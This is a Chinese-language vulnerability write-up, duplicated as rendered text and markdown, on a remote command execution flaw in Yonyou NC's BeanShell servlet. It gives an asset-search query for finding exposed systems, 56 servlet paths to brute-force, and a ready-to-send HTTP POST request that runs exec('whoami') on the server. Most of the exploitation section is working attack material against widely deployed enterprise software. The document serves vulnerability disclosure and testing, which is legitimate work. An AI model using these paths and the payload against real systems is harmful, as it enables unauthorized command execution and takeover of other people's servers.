fofamini-wiki

登录白背景

源码

用友 NC bsh.servlet.BshServlet 远程命令执行漏洞

一、漏洞描述

用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞，通过 BeanShell 执行远程命令获取服务器权限。

二、影响版本

用友NC

三、资产测绘

huiter：app.name=="用友 UAP"

登录页面

四、漏洞复现

爆破如下56个路径访问出现如下页面表示可能存在漏洞

/service/~aim/bsh.servlet.BshServlet
/service/~alm/bsh.servlet.BshServlet
/service/~ampub/bsh.servlet.BshServlet
/service/~arap/bsh.servlet.BshServlet
/service/~aum/bsh.servlet.BshServlet
/service/~cc/bsh.servlet.BshServlet
/service/~cdm/bsh.servlet.BshServlet
/service/~cmp/bsh.servlet.BshServlet
/service/~ct/bsh.servlet.BshServlet
/service/~dm/bsh.servlet.BshServlet
/service/~erm/bsh.servlet.BshServlet
/service/~fa/bsh.servlet.BshServlet
/service/~fac/bsh.servlet.BshServlet
/service/~fbm/bsh.servlet.BshServlet
/service/~ff/bsh.servlet.BshServlet
/service/~fip/bsh.servlet.BshServlet
/service/~fipub/bsh.servlet.BshServlet
/service/~fp/bsh.servlet.BshServlet
/service/~fts/bsh.servlet.BshServlet
/service/~fvm/bsh.servlet.BshServlet
/service/~gl/bsh.servlet.BshServlet
/service/~hrhi/bsh.servlet.BshServlet
/service/~hrjf/bsh.servlet.BshServlet
/service/~hrpd/bsh.servlet.BshServlet
/service/~hrpub/bsh.servlet.BshServlet
/service/~hrtrn/bsh.servlet.BshServlet
/service/~hrwa/bsh.servlet.BshServlet
/service/~ia/bsh.servlet.BshServlet
/service/~ic/bsh.servlet.BshServlet
/service/~iufo/bsh.servlet.BshServlet
/service/~modules/bsh.servlet.BshServlet
/service/~mpp/bsh.servlet.BshServlet
/service/~obm/bsh.servlet.BshServlet
/service/~pu/bsh.servlet.BshServlet
/service/~qc/bsh.servlet.BshServlet
/service/~sc/bsh.servlet.BshServlet
/service/~scmpub/bsh.servlet.BshServlet
/service/~so/bsh.servlet.BshServlet
/service/~so2/bsh.servlet.BshServlet
/service/~so3/bsh.servlet.BshServlet
/service/~so4/bsh.servlet.BshServlet
/service/~so5/bsh.servlet.BshServlet
/service/~so6/bsh.servlet.BshServlet
/service/~tam/bsh.servlet.BshServlet
/service/~tbb/bsh.servlet.BshServlet
/service/~to/bsh.servlet.BshServlet
/service/~uap/bsh.servlet.BshServlet
/service/~uapbd/bsh.servlet.BshServlet
/service/~uapde/bsh.servlet.BshServlet
/service/~uapeai/bsh.servlet.BshServlet
/service/~uapother/bsh.servlet.BshServlet
/service/~uapqe/bsh.servlet.BshServlet
/service/~uapweb/bsh.servlet.BshServlet
/service/~uapws/bsh.servlet.BshServlet
/service/~vrm/bsh.servlet.BshServlet
/service/~yer/bsh.servlet.BshServlet

在Script框中输入exec("whoami")即可执行命令

POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Connection: close
Cookie: JSESSIONID=0000nl4-L8F7pMKtOsdRw8-2rzz:nc2
Upgrade-Insecure-Requests: 1

bsh.script=exec%28%22whoami%22%29%0D%0A

原文: https://www.yuque.com/xiaokp7/ocvun2/ihxupu3hw3ft0pdd

# 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞

# 一、漏洞描述
用友 NC `bsh.servlet.BshServlet `存在远程命令执行漏洞，通过 `BeanShell` 执行远程命令获取服务器权限。

# 二、影响版本

- 用友NC

# 三、资产测绘

- huiter：`app.name=="用友 UAP"`

![image.png](./img/XWptlBzSqUaDLQXF/1691729367315-f00b542f-0929-41cc-8671-84149242ffca-148856.png)

- 登录页面

![image.png](./img/XWptlBzSqUaDLQXF/1691729393165-7891d318-bbd8-4761-87d4-76fee42778ec-937569.png)

# 四、漏洞复现
爆破如下56个路径访问出现如下页面表示可能存在漏洞
```java
/service/~aim/bsh.servlet.BshServlet
/service/~alm/bsh.servlet.BshServlet
/service/~ampub/bsh.servlet.BshServlet
/service/~arap/bsh.servlet.BshServlet
/service/~aum/bsh.servlet.BshServlet
/service/~cc/bsh.servlet.BshServlet
/service/~cdm/bsh.servlet.BshServlet
/service/~cmp/bsh.servlet.BshServlet
/service/~ct/bsh.servlet.BshServlet
/service/~dm/bsh.servlet.BshServlet
/service/~erm/bsh.servlet.BshServlet
/service/~fa/bsh.servlet.BshServlet
/service/~fac/bsh.servlet.BshServlet
/service/~fbm/bsh.servlet.BshServlet
/service/~ff/bsh.servlet.BshServlet
/service/~fip/bsh.servlet.BshServlet
/service/~fipub/bsh.servlet.BshServlet
/service/~fp/bsh.servlet.BshServlet
/service/~fts/bsh.servlet.BshServlet
/service/~fvm/bsh.servlet.BshServlet
/service/~gl/bsh.servlet.BshServlet
/service/~hrhi/bsh.servlet.BshServlet
/service/~hrjf/bsh.servlet.BshServlet
/service/~hrpd/bsh.servlet.BshServlet
/service/~hrpub/bsh.servlet.BshServlet
/service/~hrtrn/bsh.servlet.BshServlet
/service/~hrwa/bsh.servlet.BshServlet
/service/~ia/bsh.servlet.BshServlet
/service/~ic/bsh.servlet.BshServlet
/service/~iufo/bsh.servlet.BshServlet
/service/~modules/bsh.servlet.BshServlet
/service/~mpp/bsh.servlet.BshServlet
/service/~obm/bsh.servlet.BshServlet
/service/~pu/bsh.servlet.BshServlet
/service/~qc/bsh.servlet.BshServlet
/service/~sc/bsh.servlet.BshServlet
/service/~scmpub/bsh.servlet.BshServlet
/service/~so/bsh.servlet.BshServlet
/service/~so2/bsh.servlet.BshServlet
/service/~so3/bsh.servlet.BshServlet
/service/~so4/bsh.servlet.BshServlet
/service/~so5/bsh.servlet.BshServlet
/service/~so6/bsh.servlet.BshServlet
/service/~tam/bsh.servlet.BshServlet
/service/~tbb/bsh.servlet.BshServlet
/service/~to/bsh.servlet.BshServlet
/service/~uap/bsh.servlet.BshServlet
/service/~uapbd/bsh.servlet.BshServlet
/service/~uapde/bsh.servlet.BshServlet
/service/~uapeai/bsh.servlet.BshServlet
/service/~uapother/bsh.servlet.BshServlet
/service/~uapqe/bsh.servlet.BshServlet
/service/~uapweb/bsh.servlet.BshServlet
/service/~uapws/bsh.servlet.BshServlet
/service/~vrm/bsh.servlet.BshServlet
/service/~yer/bsh.servlet.BshServlet
```
![image.png](./img/XWptlBzSqUaDLQXF/1695561492851-7c034fd7-ff6d-4aa4-a124-80862cad629f-191549.png)
在`Script`框中输入`exec("whoami")`即可执行命令
![image.png](./img/XWptlBzSqUaDLQXF/1695561569756-937e62a5-3ee6-4de0-be0f-ddb2f80ef700-895128.png)
```java
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Connection: close
Cookie: JSESSIONID=0000nl4-L8F7pMKtOsdRw8-2rzz:nc2
Upgrade-Insecure-Requests: 1

bsh.script=exec%28%22whoami%22%29%0D%0A
```
![image.png](./img/XWptlBzSqUaDLQXF/1695561652492-8a6345cb-bf0d-4753-b608-bf6368e1b3d3-113885.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ihxupu3hw3ft0pdd>